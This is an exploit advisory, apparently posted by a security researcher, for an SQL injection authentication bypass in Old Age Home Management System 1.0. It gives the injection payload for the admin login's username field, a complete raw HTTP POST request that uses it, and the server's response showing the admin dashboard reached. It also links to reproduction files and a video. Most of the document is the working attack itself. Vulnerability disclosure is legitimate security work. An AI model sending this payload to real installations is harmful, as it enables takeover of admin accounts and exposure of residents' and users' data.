Old Age Home Management 1.0 SQL Injection

## Title: Old Age Home Management-2022-2023-1.0SQLi-Bypass-Authentication-Account-Take-Over## Author: nu11secur1ty## Date: 04.29.2023## Vendor: BY ANUJ KUMAR, https://phpgurukul.com/author/anujk305/## Software: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/#google_vignette## Reference: https://portswigger.net/web-security/sql-injection/lab-login-bypass## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payloads nu11secur1ty' or 1=1# ornu11secur1ty%27+or+1%3D1%23 were each submitted in the usernameparameter. These two requests resulted in different responses,indicating that the input is being incorporated into a SQL query in anunsafe way. The attacker easily can take control over the adminaccount and then everything will be lost for this app and the userswho are using it.STATUS: CRITICAL[+]Exploit:```MYSQLPOST /oahms/admin/login.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=n8igimmg4o7ddmpnbfueujouvgContent-Length: 62Cache-Control: max-age=0Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/oahms/admin/login.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closeusername=nu11secur1ty%27+or+1%3D1%23&password=password&submit=```[+]Responce:```HTTPHTTP/1.1 200 OKDate: Sat, 29 Apr 2023 05:32:07 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0Content-Security-Policy: upgrade-insecure-requests;X-Powered-By: PHP/8.2.0Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 13518<!DOCTYPE html><html lang="en"><head>  <title>Old Age Home Management System|| Dashboard</title>  <!-- base:css -->  <link rel="stylesheet" href="vendors/typicons/typicons.css">  <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css">  <link rel="stylesheet" href="css/vertical-layout-light/style.css">  <!-- endinject --></head>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0)## Proof and Exploit[href](https://streamable.com/qtj0bz)## Time spend:00:30:00